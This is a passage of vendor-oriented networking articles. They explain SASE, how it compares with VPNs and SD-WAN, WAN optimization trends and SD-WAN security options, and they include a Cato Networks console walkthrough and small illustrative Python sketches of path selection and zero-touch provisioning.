  1. All edges. A true SASE solution should be able to service all enterprise edge types.
  2. Converged. SASE’s networking and security services should be delivered from one software stack, not discrete appliances integrated together, and all must be managed via a single pane of glass.
  3. Cloud-native. A SASE solution should be built using cloud-native technologies and should support elasticity, auto-scaling and high-availability.
  4. Global. An effective SASE solution should have an extensive global footprint of Points of Presence (PoPs) covering all major locations worldwide.

SASE Showcase: Connecting & Managing All Locations Together

One of SASE’s main goals is to simplify connectivity, access, and management of the enterprise. This is achieved by unifying all the required functionality into a single solution.

For example, in Cato Networks’ SASE Cloud platform, all edges connect to the closest Cato PoP and are managed from Cato’s management console. All traffic to and from these edges undergoes the same networking optimizations and security inspections to detect and mitigate threats in real-time.


The Cato Network SASE platform provides complete connectivity & management of all endpoints

Connecting physical locations such as the headquarters, branch offices, and data centers, is the simplest scenario. They are controlled by the enterprise and enable an easy deployment of an SD-WAN appliance such as the X1500 (left) and X1700 (right) Cato Socket models shown below: 


The Cato Socket can manage multiple connections, preferably from multiple ISPs, in active/active mode and continuously monitors them to determine the best performing link to send traffic over:


On-Premises Edge

Furthermore, the Cato Socket can make user- and application-aware decisions for implementing the defined QoS policies.

In addition to connecting the enterprise’s on-premises data centers, we also need to connect cloud-based applications at public clouds (AWS and Azure). For these environments, we will use Cato’s virtual socket (vSocket) as shown below:


Defining network connectivity to any of these locations is done quickly and easily via Cato’s Management console. By clicking the Configuration drop-down menu and selecting Sites you are taken to the site configuration screen:


Site Configuration

Then by opening the Add site dialog screen, we can configure a new site. We start by naming the new site e.g Best Site Ever:


New Site Configuration


We then open the site Type drop-down menu and select the site type. Available options include Branch, Headquarters, Cloud Data Center or Data Center (on-premises):


Next, we open the “Connection Type” drop-down menu (see figure below) and select the type of Cato Socket connector we wish to use for our site:


Socket Type Selection

Physical locations typically use the X1500 or X1700 Cato Sockets, while cloud data center locations typically use one of the Cato virtual sockets (vSocket), depending on the cloud being accessed. As can be seen from the list of connection types, there is also an option to connect both physical and cloud sites using an IPsec tunnel.

The additional configurations are pretty straightforward. In addition to country and time zone, we need to define the uplink/downlink bandwidth limits for the site and the local subnet used to allocate IP addresses to local hosts. And that’s it. Our site is ready to go.

Adding remote users is also a breeze. In the configuration section below, select VPN Users:


We then click on the “+” icon and the new user dialog is shown:


New User Configuration

We fill in the user’s full name and email address, and the new user is defined. We then add the user’s phone number and a link for downloading and configuring the Cato client.

Once the Cato Client is installed and launched on the user’s device, it will automatically search for the nearest PoP and establish a secure connection with it:


The Cato SDP VPN Client

All traffic sent to and from the device is encrypted. The Cato SDP client provides a wide range of statistics, including traffic usage, PoP information, and more.

The SASE Unified Network

Once we’re done configuring all our different edges, we can easily view our entire network topology by selecting My Network > Topology


Network Topology

We can see all the edges we have defined: on-premises data centers, cloud data centers, HQ/branch offices, and remote users. We can see the status of each defined edge and take a deeper dive to view extensive analytics covering networking, security, and access metrics.

A true SASE solution should enable access and optimize and secure traffic for all network edges. It should make adding new sites and users easy and fast, and it should provide a unified view of your entire network topology.

Summary

In this article, we briefly covered the purpose of SASE and showed how a SASE solution could be used to connect all edge points within an organization, regardless of their location or size. Catonetwork’s SASE platform was used as an example to show how easily a SASE solution can be deployed to provide fast and secure access to users and offices around the world. We examined the four pillars of SASE architecture and saw what a SASE unified network looks like.

More information on SD-WAN and SASE can be found in our dedicated SASE and SD-WAN section.


SASE and VPNs: Reconsidering your Mobile Remote Access and Site-to-Site VPN strategy

The Virtual Private Network (VPN) has become the go-to security solution for keeping communications between networks and endpoints secure. After all, VPNs offer a straightforward, secure method for connecting sites (a site-to-site VPN) that couldn’t justify a high-end MPLS service, and they enable mobile users to get secure connectivity from anywhere (mobile VPN). Deployment is quick, availability is high, requiring only Internet access, and network costs are relatively low given the use of affordable Internet capacity.

Yet, for all that praise, VPNs are far from perfect. They require IT to purchase and deploy separate VPN appliances, increasing capital costs and complicating maintenance. Most VPN solutions require frequent patching, user policy settings, reconfiguration, and oversight, all of which adds to the burden of attempting to maintain security. What’s more, VPNs can introduce latency into mobile connections, as well as require additional login steps, often confusing end users and adding to the burden of the help desk.

All of these issues beg the question: is it time to drop your VPN and find a better solution for site-to-site and mobile access?

Before we answer the question, let’s take a look at the key topics covered here:

Until recently, the answer to our question above would have been “no.” There wasn’t a better answer out there. However, as networking technology has evolved, an answer to the VPN conundrum may be found in Secure Access Service Edge (SASE), the successor to SD-WAN and, quite possibly, VPNs. Here’s why. 

SASE or VPN: What’s the Difference?

SASE originates from a proposal by research giant Gartner, which defined SASE as a cloud architecture model combining the functions of different network and security solutions into a unified, cloud security platform.

SASE, as envisioned by Gartner, operates as a cloud-native service connecting all of an organization’s “edges” – including sites, mobile users, IoT devices, and cloud resources – into a single, global secure network. It’s cloud-native, meaning that the software has all of the scalability, elasticity, and rapid deployment benefits of the cloud.

And the network is secure. We don’t just mean secure as in an encrypted network, like SD-WAN. We mean one that also has a complete, embedded security stack protecting against Internet-borne threats. More specifically, Next-Generation Firewall (NGFW), CASB, SWG, ZTNA, RBI, and DNS security are all part of the SASE platform.

Devices of different sorts establish encrypted tunnels to the SASE point of presence (PoP). The software in the SASE PoP authenticates the connecting user and grants access to defined resources based on user identity and real-time conditions, such as the user’s location or device.


Incoming traffic is inspected in a single pass, with SASE applying the complete range of security functions, then optimized and forwarded along the optimum path to its destination. As such, edges gain the best possible network experience anywhere in the world; at least, that’s the theory.

SASE Brings VPN Benefits without VPN’s Networking Weaknesses

Like a VPN, SASE can operate securely over the Internet making it affordable and available everywhere. But SASE goes a few steps further than any contemporary VPN solution, bringing the kinds of performance and ease of use that previously were only afforded to sites. In short, SASE makes sites, mobile users, IoT devices and cloud resources “equal citizens” of the new WAN.

SASE simplifies deployment and maintenance by eliminating additional, specialized VPN hardware and concentrators. Instead, sites and mobile users connect directly to the SASE PoP. Sites via SASE’s global SD-WAN service; mobile users connect via client or clientless access.


And by establishing tunnels to the nearest PoP and not to one another, SASE avoids the deployment and recovery problems of full-mesh, site-to-site VPNs. In those networks, where sites maintain direct tunnels with every other location in the network, significant time is spent first by IT personnel configuring the tunnels and then by the VPN devices re-establishing tunnels after a network failure. With SASE, sites only establish one or two tunnels to the local PoP. This is done automatically, making initial deployment very easy, and with so few tunnels, recovery from a network failure takes a fraction of the time, even for what was a very large, meshed network.
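To put rough numbers on this: a full mesh of 50 sites requires 50 × 49 / 2 = 1,225 tunnels to configure and, after an outage, re-establish, whereas connecting each of those 50 sites to its nearest PoP requires only 50 tunnels (or 100 if each site keeps a backup tunnel).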

SASE also addresses the performance problem faced by VPNs. The WAN optimization and route optimization built into SASE improves traffic performance for all edges. With VPNs, those technologies either weren’t possible (in the case of mobile users) or would have required additional investment (in the case of site-to-site VPNs).

What’s more, SASE eliminates the backhaul that undermines mobile VPN performance. Instead of bringing Internet and cloud traffic back to a central inspection point, as is the case with VPNs, SASE brings security inspection to the local PoP. Traffic hits the nearest PoP, gets inspected, and is forwarded directly on to its destination.

SASE Makes Security Much Easier

Not only does SASE address VPN’s networking limitations but having a single security engine for traffic from any edge significantly simplifies security policy management and enforcement.

Access control is much tighter. Rather than giving remote users access to the entire network, SASE uses cloud-based Software Defined Perimeter (SDP), or zero trust network access (ZTNA), which restricts network access to authorized resources. Users only see the network resources, be they applications or hosts, permitted by their policy. There’s no opportunity for them to ping or use other IP tools to investigate the network and uncover unprotected resources. SDP uses strong authentication on access and continuous traffic inspection, helping to further secure endpoints.

Security management is also much easier particularly when combining VPNs with SD-WANs. Rather than maintaining separate security policies for the mobile users connected by VPN and office users sitting behind the SD-WAN device, SASE creates a single set of security policies for all users and resources.

SASE Answers the VPN Questions

SASE with cloud-based SDP proves to be faster, more secure, and easier to manage than legacy VPN systems. It’s the obvious choice for those looking for a modern VPN or to benefit from the combination of VPNs and SD-WAN.


Understanding Secure Access Service Edge (SASE) and how it integrates with SD-WAN

Software Defined Wide Area Networking (SD-WAN) is changing the way that businesses connect to the cloud. With SD-WAN, organizations can move away from closed, proprietary hardware solutions, bringing flexibility and potential cost savings to their operations.

And yet, while SD-WAN technology seems like a solution to many of the problems that businesses are having connecting to the cloud, there are still some concerns around security and that is where Secure Access Service Edge (SASE) comes into the picture.

Before we dive any deeper, let's take a quick look at what we've got covered:

What is SD-WAN?

Software Defined Wide Area Networking (SD-WAN) is a seismic shift from traditional WAN technology, where proprietary hardware and software are replaced with virtualization technology that can abstract networking from hardware. The “Software Defined” part of an SD-WAN uses virtualization to create a WAN architecture that allows enterprises to leverage any combination of transport services, including MPLS, LTE and broadband internet services, and create a fabric of connectivity that connects users to applications. SD-WANs use a centralized control plane to intelligently direct traffic across the WAN, increasing application performance, resulting in enhanced user experience, increased business productivity and reduced costs for IT.

Access popular articles covering SD-WAN topics by visiting our SD-WAN Network section

How is SASE Different from SD-WAN?

The Secure Access Service Edge, better known as SASE, is a technology proposed by research giant Gartner. The research house defines SASE as a cloud architecture that converges various network and security functions into a single cloud security and networking platform. SASE goes beyond what an SD-WAN can offer by incorporating security protocols and increases the reach of the network with support for mobile devices, IoT devices, and other devices that may not have a persistent connection to the network. What’s more, SASE can securely bridge cloud services into the SD-WAN, allowing branch offices and remote users to access services from almost any location. SASE is delivered as a service, minimizing or eliminating the need for specialized hardware or security appliances.

Understanding SASE and SD-WAN

The SASE model allows IT teams to easily connect and secure all of their organization’s networks and users in an agile, cost-effective and scalable way.


SASE in the Real World:

You can’t have SASE without SD-WAN; the two technologies have a symbiotic relationship that flattens the networking and security stack into a single connectivity stack. SASE, as envisioned by Gartner, operates as a platform which provides organizations with the ability to connect to a single secure network, which then grants secure access to physical and cloud resources, regardless of location. Or, more simply put, SASE brings security to SD-WANs by introducing four primary characteristics:

  • Identity Driven: Organizations will be able to control interactions with resources using a least-privileged strategy combined with strictly enforced access control. Attributes used by that control element include application access policy, user and group identity and the sensitivity of the data being accessed.
  • Cloud Native Architecture: The SASE model requires the implementation of several different cloud capabilities in a single platform. That platform will offer agility, be adaptive and self-updating, and will give organizations a holistic and very flexible approach to connectivity, regardless of location.
  • Support for All Edges: SASE creates a single network for all of an organization's resources: data centers, branch offices, cloud resources, and endpoints. A common interpretation of that deployment may include SD-WAN appliances for the physical edges and software clients or browser-based clientless connectors for endpoints.
  • Globally Distributed: SASE platforms must be globally distributed, meaning that SASE service providers must be able to deliver low-latency services to enterprise edges and offer low-latency connections into cloud service providers.


A proper SASE solution delivers a connectivity platform as a service which brings forth unified cloud management, with zero trust capabilities, incorporated into a single networking stack.

The Benefits of SASE:

SASE brings agility and a holistic approach to both networking and security. Ultimately, SASE proves both innovative and disruptive, and will potentially transform the way network security is consumed over traditional products and cloud services. The most notable benefits of SASE include:

  • Lowered Costs: SASE can reduce the number of components and vendors required to provide edge connectivity into the cloud, while also lowering operational overhead.
  • Improved Network Performance: SASE is built upon a global SD-WAN service, which may leverage a private backbone and incorporates automatic traffic optimization and continuity.
  • Vastly Improved Security: All traffic flow is inspected at the source and the endpoint, creating the opportunity for fully encompassing policies, which can be based upon identity, resources, or other defined elements.
  • Reduced Overhead: With SASE providers operating and maintaining the security stack, IT staffers will not have to worry about updating, patching, or scaling edge connectivity products.

The other benefits from SASE come from the adoption of an SD-WAN platform, where connections can be consolidated, and then managed from a single pane of glass. Additional benefits can be found in an SD-WAN’s core capabilities of reducing proprietary hardware needs and bringing much needed simplicity to cloud connectivity.

Who are the SASE Players:

Numerous vendors are investing in the SASE model and are bringing services online. Gartner has identified more than a dozen vendors that are developing SASE offerings, with notable players such as Cato Networks, Cisco, Fortinet and Zscaler all building SASE offerings for the market.


WAN Optimization vs SD WAN Networks. Today’s Challenges & Difficulties for WAN Optimization

Enterprises have been successfully running WAN optimization appliances at their many distributed sites for years. The devices have done a good job of helping businesses squeeze as much capacity as possible out of their WAN links and to improve performance across low-bandwidth, long-distance network circuits.

WAN optimizers were a boon to telecom budgets when network bandwidth was particularly pricey. Businesses also have used the devices to prioritize applications that are sensitive to delay and packet loss--particularly when traffic is shuttled among corporate-controlled sites.

However, changes in network traffic patterns and application protocols, the tendency to encrypt data in transit, the emergence of software-defined WAN (SD-WAN) and other factors are all challenging the need for WAN optimization in the edge appliance form factor that IT shops have traditionally deployed.

Shifting Network Landscape

While historically most application requests were directed inward, toward corporate data centers, most are now outbound, toward cloud and Internet locations. As the software as a service (SaaS) computing model continues to gain steam, these trends will only get stronger.

With much of corporate traffic headed toward the cloud, enterprises have little or no control over the far-end site. As a result, it becomes difficult to support a network topology requiring optimization appliances at both ends of the WAN link. Ever try asking Salesforce.com if you could install your own, specially configured WAN optimization appliance in their network? Good luck.

In addition, today’s security schemes can throw a wrench into traditional WAN optimization setups. Nearly all cloud-bound traffic is SSL/TLS-encrypted from the workstation to the cloud using keys that aren’t readily accessible. WAN optimizers can’t see that traffic to shape or treat it, unless the device is brought into the certification path for decryption and re-encryption before delivery. Adding that step introduces a processing burden to the optimization appliance that can impede scalability.

Another change factor is that Internet bandwidth is more plentiful than it was when WAN optimizers came to market, and it’s far more affordable than MPLS capacity. So the requirement to compress data and deduplicate packets to conserve expensive bandwidth, which traditional WAN optimizers are good at, has become less stringent.

Duplication Of Effort

There are also other ways to get some of the traditional WAN optimizer’s benefits baked right into services. Some cloud service providers, such as Amazon with its AWS Global Accelerator service, for example, help improve connections to their services, encroaching a bit on the traditional WAN optimization appliance’s turf.

Today, those WAN links are carrying predominantly HTTP and TCP traffic. That means that the need to accelerate various other application-specific protocols is disappearing. The acceleration capabilities for IP-based traffic offered by cloud providers such as Amazon are now more in demand than the multiprotocol acceleration function of traditional WAN optimizers.

The deduplication and compression capabilities of WAN optimization appliances remain beneficial. However, there is less of a need for them because of greater availability of network capacity. And cloud computing is bringing data closer to users to decrease distance-based latency.

Emergence Of SD-WANs

Amid all these WAN changes, SD-WANs have taken the industry by storm, affording the opportunity to offload traffic from pricey MPLS circuits onto lower-cost links. By incorporating dynamic path selection--the ability to route traffic across the best-performing WAN link available at the moment of transmission--the SD-WAN is subsuming a portion of the WAN optimization role. SD-WANs are still in hockey-stick growth mode, with IDC predicting a 40% compound annual growth rate through 2022.


The SD-WAN cloud is clearly the future of WAN Networking

SD-WANs, depending on the vendor, incorporate other optimization capabilities, too, such as packet-loss correction technology, TCP proxies to compensate for network latency, traffic shaping, and quality of service (QoS) priority marking.

Managed SD-WAN services, or cloud-based SD-WAN, are particularly appealing for the performance improvements they yield. In this setup, your SD-WAN service provider generally runs a private IP network, which it controls end to end. That puts the provider back in the seat of controlling both ends of your connection by linking your sites to its own backbone points of presence all over the world. That means your traffic is no longer subjected to the “best effort” nature of the public Internet, where it traverses circuits managed by multiple providers.

Different Approaches

Enterprises will always want their WAN traffic treated as efficiently as possible with the best possible application performance and response times. But where WAN optimization appliances (or WAN optimization built into edge routers) were once the sole source of application acceleration, the changing WAN landscape means that optimization is being handled in different ways. These include acceleration techniques offered by cloud vendors and, most notably, by popular SD-WAN offerings.

Where WAN optimization takes place will depend on whether you deploy SD-WAN and, if you do, which SD-WAN deployment model you choose: on-premises or as a managed, cloud-based service. One way or another, enterprises should address WAN performance so that their long-haul, particularly global, transmissions don’t sputter and choke response times of their critical applications.


How To Secure Your SD-WAN. Comparing DIY, Managed SD-WAN and SD-WAN Cloud Services

With so much enterprise network traffic now destined for the cloud, backhauling traffic across an expensive MPLS connection to a data center to apply security policy no longer makes sense. Software-defined WANs (SD-WAN) promise lower transport costs with direct, higher-performing connections to cloud and Internet resources. But what are the security implications of moving traffic off of private MPLS VPNs and onto public broadband links?

This article tackles the above and many more questions around enterprise WAN connectivity options and the different types of SD-WAN implementations, along with their advantages and disadvantages.


Directly connecting branch offices to the cloud increases your exposure to malware and Internet-borne attacks, expanding your attack surface across many sites. If not adequately addressed, these risks could outweigh the cost and performance benefits of SD-WAN. Let’s take a look at the SD-WAN options for securing your sites.


SD-WAN Deployment Options

There are a few SD-WAN options available. Each requires a different approach to branch security:

  • Do it yourself (DIY): It’s possible to build and manage your own SD-WAN by deploying firewalling and unified threat management (UTM) capabilities yourself at each branch site. You can install separate physical appliances for each type of security you need or run the security tasks as virtual network functions (VNFs) in software. VNFs usually run in a special CPE appliance, but it may also be possible to run the VNFs in your branch router, depending on which router vendor you use.
  • Telco managed SD-WAN services: This option mirrors the DIY approach above; however, a telco resells the needed SD-WAN appliances and software to you and manages the installation on your behalf. The SD-WAN setup is the same but lightens the load on your IT staff and reduces the need for specialized SD-WAN skill sets in-house.
  • SD-WAN as a cloud service (“SD-WANaaS”) from a software-defined carrier (SDC): With this option, most SD-WAN functions run as a distributed, multi-tenant software stack in a global, private cloud maintained by your SDC. The provider integrates multiple levels of security into the network in the cloud, and your traffic traverses the SDC provider’s own IP backbone, avoiding the risk and best-effort performance challenges of the public Internet.

Let’s take a closer look at each approach.

DIY: Deploying Security at Each Site

SD-WAN solutions encrypt branch traffic in transit, but they don’t protect against Internet-borne threats, such as malware. To tackle those risks, you’ll require an array of security functions, including next-generation firewalling, intrusion detection and prevention (IDS/IPS), quarantining or otherwise deflecting detected malware, and web filtering.

Those security functions can be deployed as standalone appliances, VNFs running on a vCPE, or a secure web gateway (SWG) service. Regardless, your deployment becomes more complex and your capital costs climb far beyond your SD-WAN appliance costs alone. Also, keep in mind that as traffic volumes grow, appliances and VNFs will require more processing power to keep pace with increased traffic loads, requiring appliance hardware upgrades. And while SWGs will inspect Internet traffic, they don’t inspect site-to-site traffic, opening the way for malware to move laterally once it enters the enterprise.

Telco Managed SD-WAN Services

By turning to a telco to install and manage your SD-WAN equipment, you alleviate the need for special SD-WAN skillsets in-house. The telco maintains the security edge devices and services; there’s no software patching, updating, and upgrading to worry about.

But at the same time, you’re left dependent on the telco. The telco is responsible for making network upgrades and changes and will often take far longer than if you had made those changes yourself. You’ll also be paying more each month for all of that support and integration work offloaded onto the telco.

And you’re still left with the same technical limitations of an appliance-based approach. This means that the telco must reflect all of the costs of designing and maintaining the security and networking infrastructure in their price to you. And as with a DIY approach, you’ll still be left periodically scaling your appliances as traffic loads grow, further disrupting your IT processes and increasing costs.

SD-WAN as a Service

Integrating SD-WAN with UTM by using a Software-Defined Carrier (SDC) is the simplest solution to deploy and manage and quite possibly the most secure.

Here’s why: When you use an SD-WAN-as-a-service, security is converged into the network and delivered from the cloud. You don’t have to concern yourself with scaling network security as your implementation grows. Your cloud provider has infinite, elastic resources at its disposal, far more than what a small appliance on your premises can handle.


Services offered by a complete fully-managed SD-WAN network provider

SDC services usually involve integrating the software for SD-WAN, IPsec, firewalling, and UTM into a single, software stack. By collapsing multiple security solutions into a cloud service, the provider can enforce your unified policy across all your corporate locations, users, and data.

In addition, you will be running your traffic over a higher-grade IP network than the best-effort Internet. SDCs run their own Tier-1 IP backbones with service-level agreements (SLAs) attached to them. There are both security and performance benefits inherent in using the SDC’s network infrastructure compared to the Internet.

Summary

If your organization is short on SD-WAN or security expertise, DIY might introduce cracks into your WAN and leave you vulnerable. Complexity usually increases the potential for human error, which contributes to risk. If you subscribe to that philosophy, you’re better suited to the managed service or as-a-service cloud approach.

If you’re anticipating growth, both in the number of sites and per-site traffic volume, the cloud service is a better fit for your needs. It brings scalability benefits to the table and provides extra security by transporting your traffic on a private IP backbone, which also provides a performance benefit compared to public Internet links.

The benefits of a secure SD-WAN, however you choose to achieve it, are many. You’ll reduce infrastructure and circuit costs while improving performance with direct-connected links to cloud and Internet resources. You just need to be sure the t’s are crossed and the i’s are dotted on security so you can enjoy SD-WAN’s many advantages with a clean conscience.


The Most Common Worst Networking Practices and How To Fix Them

In the rush to keep pace with the many challenges facing today’s organizations, all too often networking teams end up adopting practices and processes that are, shall we say, less than perfect. You probably have seen a few yourself in your own organization.

Management refusing to consider new vendors because, well, they’re new. Engineers wanting to do everything manually when automation would save them a ton of time. Overspending on capacity when there are more affordable alternatives. You get the picture.

Some practices are well known; others are less obvious. A great starting point for identifying the worst of the worst in your organization is a recent list compiled by Gartner, which culls insight from several thousand client interactions. While the Gartner report requires payment, a free eBook from Cato Networks explains each networking practice and how it can be addressed with a cloud-based SD-WAN.

The practices fall into three categories — cultural, design and operational, and financial:

  • Cultural practices describe how IT teams relate to collaboration and, more broadly, innovation. Excessive risk avoidance is one example of a “worst” cultural practice. Adherence to manually configuring networking devices and the silo-ism that often crops up among IT teams are other examples.
  • Design and operational practices are those that restrict the agility, increase the costs, and complicate the troubleshooting of the enterprise network. These practices often stem from having amassed legacy technologies, forcing less-than-ideal practices. Other examples include the lack of a business-centric network strategy, spending too much on WAN bandwidth, and restricted visibility into the network.
  • Financial “bad” practices stem from the dependencies IT organizations have on their legacy vendor relationships. All too often, busy IT professionals cut corners by leaning on their vendors for technology advice. This is particularly the case with newer technologies, where an IT professional may lack sufficient background to conduct an assessment. Vendors and their partners have a commercial interest in furthering their own aims, of course. As such, companies end up being locked into vendors or following questionable advice.

Often, worst practices grow out of the best intentions, evolving incrementally over time. Risk avoidance isn’t inherently bad, for example. It stems from the healthy desire to limit network outages. But excessive risk avoidance stems from organizational cultures where teams are locked into dysfunctional postmortems, blaming one another. 

Adopting technologies that encourage transparency can help address the problem. With a common portal used by all offsite networking teams — security, WAN, and mobile — problem resolution is faster, collaboration easier, and finger pointing is eliminated. How do you do that? To learn more, check out the eBook here.


SD-WAN is the Emerging, Evolving Solution for the Branch Office

A lot has changed in how people work during the past twenty years. Co-working spaces, mobility, and the cloud now are common. Businesses are spread out and branch offices are empowered.

This new functionality is a good thing, of course. But, at the same time, it raises a big challenge: Multiprotocol Label Switching (MPLS), the way in which most branch offices network today, is a poor match for this new environment. It is an expensive and rigid one-size-fits-all approach to an environment that prizes fluidity and flexibility.

The answer is Software-Defined Wide Area Networking (SD-WAN). It matches the network to branch offices’ needs and provides a superior user experience. It also has the potential to reduce costs.

Our Complete Guide to SD-WAN Technology article provides in-depth coverage of SD-WAN Security, Management, Mobility, VPNs, Architecture and more.

SD-WAN is still a work in progress, no doubt, but the technology is positioned to be the next wave in branch office connectivity -- here's why.

Welcome to the New Branch

Enterprises generally configure WANs in a classic hub-and-spoke manner. Branches are the ends of the spokes and resources are in the hub, typically the headquarters or datacenters. Internet traffic is backhauled across the MPLS-based WAN to the hub for delivery through a secured Internet access connection.

That’s a solid, bulletproof approach. However, branch operations have changed radically since MPLS was introduced in the late 1990s. Back then, branch offices were comfortable with a T1 or two. Today’s offices need five times that amount. Back then, most applications and services terminated at MPLS-attached datacenters, not the Internet. Today, most traffic goes out to the Internet. Back then, most work was done in offices. Today, work is done, well, everywhere.

MPLS Problems Hurt the New Branch

MPLS-based architectures are a poor fit for the new branch. MPLS bandwidth is far more costly than Internet bandwidth (exact amounts vary between regions and packages). Installation can take months, especially if the provider doesn’t have any available circuits; bandwidth upgrades take weeks. This, needless to say, is too slow for today’s environment. International deployments only add to the problems.

The cost and inflexibility of MPLS lead many organizations to skimp on branch office bandwidth and, often, skip redundancy. Instead, the sites are linked by non-redundant cable, DSL or wireless services and therefore are vulnerable to circuit failures and downtime. The use of separate networks makes creating a fully meshed architecture, where every office has a direct connection to every other office, far more difficult, impacting Active Directory and VoIP design. Those connected to MPLS face delays when more bandwidth is needed, such as for branch expansions and seasonal traffic spikes.

The same antiquated approach extends to contracts. Branch offices often are temporary. One may start in somebody’s home. That worker may quickly be grouped with other workers at a larger branch across town. The three-year contracts offered by MPLS providers are simply inappropriate for such small or transient branch offices.

And none of this says anything about two shifts in enterprise networking -- the cloud and mobility. Backhauling Internet traffic adds too much latency, degrading the user experience. Often traffic is backhauled only to be sent back across the Internet to a site near the edge. This back and forth -- aptly called the “trombone effect” -- causes significant latency problems and consumes expensive MPLS bandwidth, particularly when the central site and branch office are far from each other.

No Support for Mobile Users

WANs are all about physical locations. Mobile users, who were not that big a deal “back in the day,” are not supported by MPLS-based WANs.

Typically, mobile employees connect through VPNs to on-premises firewalls or concentrators. Data is sent either to a local access point or a centralized and secure access point on the WAN. In such scenarios, applications and other resources generally are located in different places. This leads to split tunnels and management complexity, which is the enemy of efficient, low latency and inexpensive operations.

One option is site-to-site connectivity via firewall-based VPNs. It’s a bad option, however, because it necessitates convoluted Internet routing. The resulting jitter, latency and packet loss impact voice, video and other sensitive applications. It is a workaround that causes as many problems as it solves.

SD-WAN is the Answer

SD-WANs answer these challenges -- and more. As the name implies, SD-WANs are a subset of the software-defined networking concept, which separates the data being transported from the routing and provisioning information directing the journey, increasing flexibility by orders of magnitude.

The initial versions of SD-WAN focused on bandwidth provisioning and last-mile link bonding. That was a great advance. The arrival of SD-WAN 2.0 was even more exciting, envisioning the entire network -- the branches, the headquarters, the datacenter and so forth -- as a single unified entity. It adds four elements that enable a path with the desired attributes to be found through this network (a sketch of the path-selection step follows the list):

  • Controllers create traffic policies and send them to virtual and/or physical appliances at each location.
  • Virtualized data services normalize Internet services, such as xDSL, cable, and 4G/LTE, as well as MPLS into a single network.
  • Virtual overlays are secure tunnels that enable underlying data services to be temporarily and fluidly cobbled together -- virtualized -- to create an optimal path and its service characteristics.
  • Application-aware routing is the process of choosing the path with the desired end-to-end performance characteristics. The variables include application requirements, business policies, and real-time network conditions.
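
A minimal Python sketch of that path-selection step is shown below. The application policies, path measurements and cost figures are invented for illustration; they stand in for the business policies and real-time conditions an SD-WAN node would actually consult.

# Hypothetical sketch of application-aware routing: keep the paths that meet the
# application's tolerances, then apply a business-policy tie-breaker (cost).
APP_POLICIES = {
    "voip": {"max_latency_ms": 150, "max_loss_pct": 1.0},
    "ftp":  {"max_latency_ms": 500, "max_loss_pct": 5.0},
}

# Real-time measurements a node might hold for each underlying data service.
PATHS = {
    "mpls":      {"latency_ms": 40,  "loss_pct": 0.1, "cost": 10},
    "broadband": {"latency_ms": 180, "loss_pct": 1.5, "cost": 1},
}

def select_path(app):
    policy = APP_POLICIES[app]
    eligible = [
        name for name, m in PATHS.items()
        if m["latency_ms"] <= policy["max_latency_ms"]
        and m["loss_pct"] <= policy["max_loss_pct"]
    ]
    # Prefer the cheapest path that still satisfies the application.
    return min(eligible, key=lambda name: PATHS[name]["cost"]) if eligible else None

print(select_path("voip"))   # mpls: broadband's 180 ms exceeds the VoIP tolerance
print(select_path("ftp"))    # broadband: both qualify, so the cheaper link wins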

Branches become part of this holistic network through an SD-WAN node, which usually is an appliance connected to the LAN on the branch side, and to MPLS and an Internet service such as cable or DSL on the network side.

When they are installed, the SD-WAN nodes, using zero-touch provisioning, point to a predetermined IP address that links them to the controller. Policies are uploaded to the device. These generally include port configuration, business policies (such as priority and thresholds for failover) and application requirements. This information is combined with real-time data to determine the best network path. Latency-intolerant VoIP sessions, for instance, may be carried over MPLS and bandwidth-intensive FTP transfers via broadband.
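
The zero-touch provisioning step itself can be pictured with the short sketch below. The controller address, serial number and profile fields are hypothetical stand-ins; a real node would authenticate and download its profile from its vendor's controller rather than use the hard-coded values shown here.

# Hypothetical zero-touch provisioning sketch: a freshly powered-on node calls
# home to a predetermined controller address and applies whatever it receives.
CONTROLLER = "203.0.113.10"      # predetermined address baked into the node (documentation range)

def fetch_profile(serial_number):
    # Stand-in for an authenticated HTTPS download keyed to the node's serial number.
    return {
        "ports": {"wan1": "mpls", "wan2": "broadband", "lan1": "vlan-10"},
        "business_policy": {"failover_loss_pct": 2.0, "voip_priority": "high"},
        "app_policies": ["voip", "ftp", "saas-default"],
    }

def provision(serial_number):
    print(f"contacting controller {CONTROLLER} as {serial_number}")
    profile = fetch_profile(serial_number)
    for port, role in profile["ports"].items():
        print(f"configuring {port} as {role}")
    print(f"installed {len(profile['app_policies'])} application policies")
    print(f"failover threshold: {profile['business_policy']['failover_loss_pct']}% loss")

provision("SDWAN-EDGE-0042")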

The Different Worlds of MPLS and SD-WAN

Once SD-WANs are accepted as a possible alternative to MPLS-based WANs for branch offices, the focus turns to cost comparisons. The answer is complex. Bandwidth costs go down in an SD-WAN environment because cheaper broadband is a viable alternative for much traffic. On the other hand, security costs rise because branches with direct Internet access (DIA) require next-generation firewalls (NGFWs), IDS/IPS, sandboxing and other security elements. These systems also must be patched and upgraded as necessary, which adds to opex.

Another change is in vendor relationships. MPLS implementations generally are handled by a single vendor (the famous “one throat to choke”). SD-WAN deployments usually rely on multiple suppliers. This adds complexity to elements such as inventory and payment management, and this complexity impacts costs. On a deeper level, SD-WAN enables changes to be implemented much faster than MPLS. The cost ramifications of adding bandwidth to meet an unexpected sales spike immediately (in the case of SD-WAN) compared to next month (MPLS) are hard to pin down. There is no doubt, however, that adding the bandwidth quickly is a benefit.

Our article MPLS vs SD-WAN provides addition considerations between the two for organizations around the world.

Is SD-WAN Totally Mature? No...

SD-WAN is a young technology that still is evolving in fundamental ways. Organizations considering the technology should be aware of the shortcomings of SD-WAN 2.0.

A key obstacle is related to the need for hardware. In SD-WAN 2.0, DIA is hardware-based. Placing an appliance at each branch office is expensive, as noted above, and requires capacity planning, configuration and maintenance including updates, patches and, perhaps, upgrades that can require hardware changeouts. Security is handled as it is at more substantial corporate locations.

A second shortcoming is that an SD-WAN doesn’t eliminate MPLS (or an equivalent SLA-backed service). Broadband still is an iffy proposition for latency- and loss-sensitive applications. Thus, an SLA-based service remains part of the picture. That makes sense, but it’s odd to go to great trouble to wean the organization off a particular technology -- and retain it.

A third challenge is that today’s SD-WANs don’t do a good job of supporting mobile users and the cloud. Mobile support requires additional hardware and software. SD-WANs only support clouds in a one-off proprietary manner. These approaches add complexity and aren’t a long term solution.

SD-WAN 3.0: How SD-WAN Services Help

The next version of SD-WAN confronts these challenges. SD-WAN 3.0 -- which also is known as SD-WAN as a Service (SDWaaS) -- is fully inclusive. It provides branch office and mobile users with secure end-to-end connectivity to the cloud and data centers.

